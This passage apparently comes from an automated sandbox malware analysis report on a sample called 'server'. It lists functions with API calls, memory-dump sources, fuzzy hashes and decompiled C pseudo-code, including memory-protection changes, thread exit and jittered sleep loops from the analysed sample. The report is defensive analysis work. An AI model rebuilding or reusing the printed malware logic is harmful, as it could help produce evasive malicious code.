            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00780005 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226memoryCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction ID: 8db1c3434d2ada7da5ffd95a7bf451fbefe288298b4c72c7a0d0cc5204748d9a
            • Opcode Fuzzy Hash: 6bdfaac6897b95ce373e99708c469e13dbd82992d17ba98ec564c2ec7f351265
            • Instruction Fuzzy Hash: 23C1ABB5D01228EFDF60CFA8D985BDDBBB5BF08300F108099E548A7252DB359A94DF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E4358 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(80000002), ref: 007E43B5
            • SysAllocString.OLEAUT32(007E4D42), ref: 007E43F9
            • SysFreeString.OLEAUT32(00000000), ref: 007E440D
            • SysFreeString.OLEAUT32(00000000), ref: 007E441B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: e99642ed9f762d1bbff29444dd298770ad74d8faed257f2e80d6a556cd207f84
            • Instruction ID: e8afaebe59bf701971430bb78b7f6c1e71c0cb9fd4998ab5ba79e2a1b3c124dd
            • Opcode Fuzzy Hash: e99642ed9f762d1bbff29444dd298770ad74d8faed257f2e80d6a556cd207f84
            • Instruction Fuzzy Hash: F9310EB6901289EFCB05DF99D8C49AE7BB5FF4D300B20842AF506DB250D7389A41CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E213E Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
            Download Yara Rule
            C-Code - Quality: 65%
            			E007E213E(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L007E8436();
					_t34 = _t16 + _t13;
					_t17 = E007E6269(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











            0x007e2143
            0x007e214e
            0x007e214f
            0x007e214f
            0x007e215b
            0x007e2164
            0x007e2167
            0x007e216b
            0x007e216d
            0x007e2172
            0x007e2173
            0x007e2174
            0x007e217e
            0x007e2181
            0x007e2188
            0x007e218c
            0x007e2193
            0x007e2199
            0x007e21a3

            APIs
            • SwitchToThread.KERNEL32(?,00000001,?,?,?,007E5044,?,?), ref: 007E214F
            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,007E5044,?,?), ref: 007E215B
            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 007E2174
              • Part of subcall function 007E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 007E6308
            • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,007E5044,?,?), ref: 007E2193
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
            • String ID:
            • API String ID: 1610602887-0
            • Opcode ID: 57fc43cb9f48d8bdb6534f51e147acb9f3adc5f15fd5052eb567c4dfbff0b020
            • Instruction ID: 2589ab9516b7cc5dc5c65511e7a16fc49768cf79e35f44ff518a1a8b66bb6c10
            • Opcode Fuzzy Hash: 57fc43cb9f48d8bdb6534f51e147acb9f3adc5f15fd5052eb567c4dfbff0b020
            • Instruction Fuzzy Hash: 18F0A477B41245BBD7149BA5CC5EBDF76BDDB88361F500124F601E7340E9B89A018694
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5364 Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E007E5364(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x7ea3cc; // 0x2f19600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x7ea3cc; // 0x2f19600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x7ea030) {
					HeapFree( *0x7ea2d8, 0, _t8);
				}
				_t9 = E007E12C6(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x7ea3cc; // 0x2f19600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











            0x007e5364
            0x007e5364
            0x007e536d
            0x007e537d
            0x007e537d
            0x007e5382
            0x007e5387
            0x00000000
            0x00000000
            0x007e5377
            0x007e5377
            0x007e5389
            0x007e538d
            0x007e539f
            0x007e539f
            0x007e53aa
            0x007e53af
            0x007e53b2
            0x007e53b7
            0x007e53bb
            0x007e53c1

            APIs
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E536D
            • Sleep.KERNEL32(0000000A), ref: 007E5377
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E539F
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E53BB
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID:
            • API String ID: 58946197-0
            • Opcode ID: 44aa88f5b0073540f4f747b47a9dac38429a44e495d61dd31e078c0a19e8d10d
            • Instruction ID: 43e9f158a70b052bd6a924c32b8869baccbb90349d358a1cbe49668922365fde
            • Opcode Fuzzy Hash: 44aa88f5b0073540f4f747b47a9dac38429a44e495d61dd31e078c0a19e8d10d
            • Instruction Fuzzy Hash: E3F0F4716035C2EBD7209F66DD89F167BE4AF5D384B04C414F601DE271D678E850DB29
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5251 Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E5251(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E007E6ADC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x7ea348; // 0x272d5a8
				_t4 = _t24 + 0x7ebc70; // 0x2f19218
				_t5 = _t24 + 0x7ebb60; // 0x4f0053
				_t26 = E007E33F1( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x7ea348; // 0x272d5a8
						_t11 = _t32 + 0x7ebcc8; // 0x2f19270
						_t48 = _t11;
						_t12 = _t32 + 0x7ebb60; // 0x4f0053
						_t52 = E007E5DE4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x7ea348; // 0x272d5a8
							_t13 = _t35 + 0x7ebcf0; // 0x30314549
							if(E007E5157(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x7ea2fc - 6;
								if( *0x7ea2fc <= 6) {
									_t42 =  *0x7ea348; // 0x272d5a8
									_t15 = _t42 + 0x7ebcd2; // 0x52384549
									E007E5157(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x7ea348; // 0x272d5a8
							_t17 = _t38 + 0x7ebbb8; // 0x2f19160
							_t18 = _t38 + 0x7ebc1c; // 0x680043
							_t45 = E007E5B0E(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x7ea2d8, 0, _t52);
						}
					}
					HeapFree( *0x7ea2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E007E7220(_t54);
				}
				return _t45;
			}


















            0x007e5251
            0x007e5261
            0x007e5264
            0x007e526b
            0x007e526d
            0x007e526d
            0x007e5270
            0x007e5275
            0x007e527c
            0x007e5289
            0x007e528e
            0x007e5292
            0x007e52a0
            0x007e52ae
            0x007e52b2
            0x007e5343
            0x007e5343
            0x007e52b8
            0x007e52b8
            0x007e52bd
            0x007e52bd
            0x007e52c4
            0x007e52d0
            0x007e52d2
            0x007e52d4
            0x007e52d6
            0x007e52dd
            0x007e52ef
            0x007e52f1
            0x007e52f8
            0x007e52fa
            0x007e5301
            0x007e530c
            0x007e530c
            0x007e52f8
            0x007e5311
            0x007e5316
            0x007e531d
            0x007e533b
            0x007e533d
            0x007e533d
            0x007e52d4
            0x007e534f
            0x007e534f
            0x007e5351
            0x007e5356
            0x007e5358
            0x007e5358
            0x007e5363

            APIs
            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02F19218,00000000,?,74D0F710,00000000,74D0F730), ref: 007E52A0
            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02F19160,?,00000000,30314549,00000014,004F0053,02F19270), ref: 007E533D
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007E68B6), ref: 007E534F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 508fe2d64be6e9d706f124248d122e50bd52bc0a0d2887547260b8237b7e4862
            • Instruction ID: 2c29c74a185216e52bc3c275e36749e39b337ac9d999b4435b3ee9fcf1dfec1b
            • Opcode Fuzzy Hash: 508fe2d64be6e9d706f124248d122e50bd52bc0a0d2887547260b8237b7e4862
            • Instruction Fuzzy Hash: 0831A03190228CFFCB11DB96DC88EAA3BBCFB4C748F140195B601AB121D7786E04DB15
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t42;
				long _t53;
				intOrPtr _t56;
				void* _t57;
				signed int _t59;

				_v12 = _v12 & 0x00000000;
				_t56 =  *0x404180;
				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t59 = _v12;
					if(_t59 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t53 = _t56 - 0x43175abf;
							L9:
							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
							if(_t42 == 0) {
								_v12 = GetLastError();
							}
							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
							_v8 = _v8 + 1;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t53 = _t56 - 0x43175ac1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						_t53 = _t56 - 0x43175aa3;
					} else {
						_t53 = _t56 - 0x43175a83;
					}
					goto L9;
				}
				goto L12;
			}












            0x004014d9
            0x004014e6
            0x004014ec
            0x004014f8
            0x00401508
            0x0040150a
            0x00401512
            0x004015a6
            0x004015ad
            0x00000000
            0x00000000
            0x00000000
            0x00401518
            0x00401518
            0x00401518
            0x0040151c
            0x00000000
            0x00000000
            0x00401528
            0x0040152c
            0x00401550
            0x00401554
            0x00401568
            0x00401568
            0x0040156e
            0x0040157d
            0x00401581
            0x00401589
            0x00401589
            0x00401595
            0x00401597
            0x004015a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004015a0
            0x0040155c
            0x00401560
            0x00401566
            0x00000000
            0x00000000
            0x00000000
            0x00401566
            0x00401534
            0x00401538
            0x00401542
            0x0040153a
            0x0040153a
            0x0040153a
            0x00000000
            0x00401538
            0x00000000

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E12C6 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E007E12C6(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E007E33DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x7e9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











            0x007e12ca
            0x007e12d7
            0x007e12d9
            0x007e12da
            0x007e12e2
            0x007e12e2
            0x007e12e6
            0x00000000
            0x00000000
            0x007e12dd
            0x007e12de
            0x007e12e1
            0x007e12e1
            0x007e12ee
            0x007e12f3
            0x007e12f8
            0x007e1300
            0x007e1306
            0x007e1308
            0x007e130b
            0x007e130f
            0x007e1311
            0x007e1314
            0x007e1314
            0x007e1315
            0x007e1317
            0x007e1314
            0x007e1321
            0x007e1324
            0x007e1327
            0x007e1328
            0x007e132a
            0x007e1331
            0x007e1331
            0x007e133d

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,02F195FC,?,?,007E53AF,?,02F195FC), ref: 007E12E2
            • StrTrimA.KERNELBASE(?,007E9278,00000002,?,007E53AF,?,02F195FC), ref: 007E1300
            • StrChrA.SHLWAPI(?,00000020,?,007E53AF,?,02F195FC), ref: 007E130B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: a37b7e76afa6df6e6337813cba78dccae8ffb8e667e44e94d18f69bc452e9b73
            • Instruction ID: c52483e7f0bfd2ffa22620ec6871e951bbbf6fefb136b358c099f212a7fb56f0
            • Opcode Fuzzy Hash: a37b7e76afa6df6e6337813cba78dccae8ffb8e667e44e94d18f69bc452e9b73
            • Instruction Fuzzy Hash: D901B1713023CA6FE7104A6BCC8AFA77B9CEB9D340F944011BA55CB282D678D841C260
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F577 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON
            Download Yara Rule
            APIs
            • ___initmbctable.LIBCMT ref: 0040F57F
              • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: ___initmbctable__setmbcp
            • String ID:
            • API String ID: 2112888233-3916222277
            • Opcode ID: 68f949c2c55029241f175aefdf2374c2a52686099cbe676960ad780aa8636ba8
            • Instruction ID: b119f28ca3ceabddb3565d55078709d5e9eb7dd16c3fed682e25218ba2407311
            • Opcode Fuzzy Hash: 68f949c2c55029241f175aefdf2374c2a52686099cbe676960ad780aa8636ba8
            • Instruction Fuzzy Hash: D7410472808204AFEB318F249C04B577BA5AF51364F24493BE841A36E2E77E4C4AC75D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E790B Relevance: 3.1, APIs: 2, Instructions: 112COMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E007E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E007E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x7ea348; // 0x272d5a8
						_t20 = _t68 + 0x7eb270; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E007E4984(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















            0x007e7911
            0x007e7914
            0x007e7924
            0x007e792d
            0x007e7931
            0x007e79ff
            0x007e7a05
            0x007e7a05
            0x007e794b
            0x007e7950
            0x007e7954
            0x007e795a
            0x007e795f
            0x007e7966
            0x007e7975
            0x007e7975
            0x007e7979
            0x007e797b
            0x007e7987
            0x007e7992
            0x007e799d
            0x007e79a1
            0x007e79ab
            0x007e79af
            0x007e79b1
            0x007e79b6
            0x007e79bd
            0x007e79cd
            0x007e79cd
            0x007e79b6
            0x007e79af
            0x007e79cf
            0x007e79d4
            0x007e79d9
            0x007e79d9
            0x007e79dc
            0x007e79e5
            0x007e79ea
            0x007e79ea
            0x007e79ef
            0x007e79f4
            0x007e79f4
            0x007e79ef
            0x007e7979
            0x007e79f6
            0x007e79fc
            0x00000000

            APIs
              • Part of subcall function 007E4358: SysAllocString.OLEAUT32(80000002), ref: 007E43B5
              • Part of subcall function 007E4358: SysFreeString.OLEAUT32(00000000), ref: 007E441B
            • SysFreeString.OLEAUT32(?), ref: 007E79EA
            • SysFreeString.OLEAUT32(007E4D42), ref: 007E79F4
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0
            • Opcode ID: 58a2bd5eca70f526a3fbe29eb1563566c81d04d98b7f2defd6013313bbe649e5
            • Instruction ID: 4a2ac93ef1376db423748be1a023bf2814c912fb56f162ed78e4f6f4edd5e117
            • Opcode Fuzzy Hash: 58a2bd5eca70f526a3fbe29eb1563566c81d04d98b7f2defd6013313bbe649e5
            • Instruction Fuzzy Hash: 34314872500199EFCF15DF59C888CABBB7AFF8D7407144658F8059B211D335AD91CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040139F() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x40513c;
				} else {
					_t16 = _t15 + 0x40529c;
				}
				E00401D3C(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FE6(_t32 + 4);
						}
					}
					_t25 = E004012FB(_v28); // executed
				}
				ExitThread(_t25);
			}
















            0x004013a5
            0x004013b6
            0x004013c0
            0x004013b8
            0x004013b8
            0x004013b8
            0x004013c7
            0x004013d0
            0x004013d5
            0x004013ec
            0x004013f3
            0x00401450
            0x004013f5
            0x004013fb
            0x00401401
            0x0040140f
            0x00401413
            0x0040141a
            0x00401422
            0x00401426
            0x0040142e
            0x0040143f
            0x00401430
            0x00401436
            0x00401436
            0x0040142e
            0x00401447
            0x00401447
            0x00401452

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 008558CF Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
            Download Yara Rule
            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008558F7
            • Module32First.KERNEL32(00000000,00000224), ref: 00855917
            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
